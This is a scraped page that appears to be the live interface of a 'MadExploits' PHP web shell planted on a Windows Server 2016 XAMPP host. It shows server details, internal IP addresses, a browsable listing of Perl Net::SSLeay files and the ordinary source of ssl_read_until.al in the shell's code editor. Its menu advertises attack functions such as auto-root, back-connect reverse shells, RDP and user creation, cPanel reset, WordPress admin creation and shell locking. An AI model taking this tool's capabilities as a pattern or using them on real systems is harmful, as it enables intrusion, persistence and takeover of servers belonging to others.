Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
auto /
Net /
SSLeay /
[ HOME SHELL ]
Name
Size
Permission
Action
.packlist
4.79
KB
-rw-rw-rw-
SSLeay.xs.dll
473
KB
-rw-rw-rw-
autosplit.ix
1.62
KB
-rw-rw-rw-
debug_read.al
699
B
-rw-rw-rw-
do_https.al
527
B
-rw-rw-rw-
do_https2.al
459
B
-rw-rw-rw-
do_https3.al
479
B
-rw-rw-rw-
do_https4.al
369
B
-rw-rw-rw-
do_httpx2.al
577
B
-rw-rw-rw-
do_httpx3.al
1.56
KB
-rw-rw-rw-
do_httpx4.al
562
B
-rw-rw-rw-
dump_peer_certificate.al
987
B
-rw-rw-rw-
get_http.al
325
B
-rw-rw-rw-
get_http3.al
328
B
-rw-rw-rw-
get_http4.al
328
B
-rw-rw-rw-
get_https.al
328
B
-rw-rw-rw-
get_https3.al
331
B
-rw-rw-rw-
get_https4.al
331
B
-rw-rw-rw-
get_httpx.al
325
B
-rw-rw-rw-
get_httpx3.al
328
B
-rw-rw-rw-
get_httpx4.al
328
B
-rw-rw-rw-
head_http.al
329
B
-rw-rw-rw-
head_http3.al
332
B
-rw-rw-rw-
head_http4.al
358
B
-rw-rw-rw-
head_https.al
332
B
-rw-rw-rw-
head_https3.al
335
B
-rw-rw-rw-
head_https4.al
345
B
-rw-rw-rw-
head_httpx.al
329
B
-rw-rw-rw-
head_httpx3.al
332
B
-rw-rw-rw-
head_httpx4.al
412
B
-rw-rw-rw-
http_cat.al
1.21
KB
-rw-rw-rw-
https_cat.al
3.05
KB
-rw-rw-rw-
httpx_cat.al
576
B
-rw-rw-rw-
initialize.al
842
B
-rw-rw-rw-
make_form.al
629
B
-rw-rw-rw-
make_headers.al
596
B
-rw-rw-rw-
new_x_ctx.al
1.86
KB
-rw-rw-rw-
open_proxy_tcp_connection.al
1.28
KB
-rw-rw-rw-
open_tcp_connection.al
1.49
KB
-rw-rw-rw-
post_http.al
327
B
-rw-rw-rw-
post_http3.al
330
B
-rw-rw-rw-
post_http4.al
330
B
-rw-rw-rw-
post_https.al
330
B
-rw-rw-rw-
post_https3.al
333
B
-rw-rw-rw-
post_https4.al
333
B
-rw-rw-rw-
post_httpx.al
327
B
-rw-rw-rw-
post_httpx3.al
330
B
-rw-rw-rw-
post_httpx4.al
330
B
-rw-rw-rw-
put_http.al
325
B
-rw-rw-rw-
put_http3.al
328
B
-rw-rw-rw-
put_http4.al
328
B
-rw-rw-rw-
put_https.al
328
B
-rw-rw-rw-
put_https3.al
331
B
-rw-rw-rw-
put_https4.al
331
B
-rw-rw-rw-
put_httpx.al
325
B
-rw-rw-rw-
put_httpx3.al
328
B
-rw-rw-rw-
put_httpx4.al
328
B
-rw-rw-rw-
randomize.al
1.03
KB
-rw-rw-rw-
set_cert_and_key.al
851
B
-rw-rw-rw-
set_proxy.al
557
B
-rw-rw-rw-
set_server_cert_and_key.al
427
B
-rw-rw-rw-
ssl_read_CRLF.al
394
B
-rw-rw-rw-
ssl_read_all.al
1.06
KB
-rw-rw-rw-
ssl_read_until.al
3.16
KB
-rw-rw-rw-
ssl_write_CRLF.al
835
B
-rw-rw-rw-
ssl_write_all.al
5.74
KB
-rw-rw-rw-
sslcat.al
3.15
KB
-rw-rw-rw-
tcp_read_CRLF.al
411
B
-rw-rw-rw-
tcp_read_all.al
782
B
-rw-rw-rw-
tcp_read_until.al
1003
B
-rw-rw-rw-
tcp_write_CRLF.al
816
B
-rw-rw-rw-
tcp_write_all.al
1.24
KB
-rw-rw-rw-
tcpcat.al
1.36
KB
-rw-rw-rw-
tcpxcat.al
502
B
-rw-rw-rw-
want_X509_lookup.al
456
B
-rw-rw-rw-
want_nothing.al
368
B
-rw-rw-rw-
want_read.al
318
B
-rw-rw-rw-
want_write.al
321
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ssl_read_until.al
# NOTE: Derived from blib\lib\Net\SSLeay.pm. # Changes made here will be lost when autosplit is run again. # See AutoSplit.pm. package Net::SSLeay; #line 799 "blib\lib\Net\SSLeay.pm (autosplit into blib\lib\auto\Net\SSLeay\ssl_read_until.al)" ### from patch by Clinton Wong <clintdw@netcom.com> # ssl_read_until($ssl [, $delimit [, $max_length]]) # if $delimit missing, use $/ if it exists, otherwise use \n # read until delimiter reached, up to $max_length chars if defined sub ssl_read_until ($;$$) { my ($ssl,$delim, $max_length) = @_; # guess the delim string if missing if ( ! defined $delim ) { if ( defined $/ && length $/ ) { $delim = $/ } else { $delim = "\n" } # Note: \n,$/ value depends on the platform } my $len_delim = length $delim; my ($got); my $reply = ''; # If we have OpenSSL 0.9.6a or later, we can use SSL_peek to # speed things up. # N.B. 0.9.6a has security problems, so the support for # anything earlier than 0.9.6e will be dropped soon. if (&Net::SSLeay::OPENSSL_VERSION_NUMBER >= 0x0090601f) { $max_length = 2000000000 unless (defined $max_length); my ($pending, $peek_length, $found, $done); while (blength($reply) < $max_length and !$done) { #Block if necessary until we get some data $got = Net::SSLeay::peek($ssl,1); last if print_errs('SSL_peek'); $pending = Net::SSLeay::pending($ssl) + blength($reply); $peek_length = ($pending > $max_length) ? $max_length : $pending; $peek_length -= blength($reply); $got = Net::SSLeay::peek($ssl, $peek_length); last if print_errs('SSL_peek'); $peek_length = blength($got); #$found = index($got, $delim); # Old and broken # the delimiter may be split across two gets, so we prepend # a little from the last get onto this one before we check # for a match my $match; if(blength($reply) >= blength($delim) - 1) { #if what we've read so far is greater or equal #in length of what we need to prepatch $match = substr $reply, blength($reply) - blength($delim) + 1; } else { $match = $reply; } $match .= $got; $found = index($match, $delim); if ($found > -1) { #$got = Net::SSLeay::ssl_read_all($ssl, $found+$len_delim); #read up to the end of the delimiter $got = Net::SSLeay::ssl_read_all($ssl, $found + $len_delim - ((blength($match)) - (blength($got)))); $done = 1; } else { $got = Net::SSLeay::ssl_read_all($ssl, $peek_length); $done = 1 if ($peek_length == $max_length - blength($reply)); } last if print_errs('SSL_read'); debug_read(\$reply, \$got) if $trace>1; last if $got eq ''; $reply .= $got; } } else { while (!defined $max_length || length $reply < $max_length) { $got = Net::SSLeay::ssl_read_all($ssl,1); # one by one last if print_errs('SSL_read'); debug_read(\$reply, \$got) if $trace>1; last if $got eq ''; $reply .= $got; last if $len_delim && substr($reply, blength($reply)-$len_delim) eq $delim; } } return $reply; } # end of Net::SSLeay::ssl_read_until 1;
Close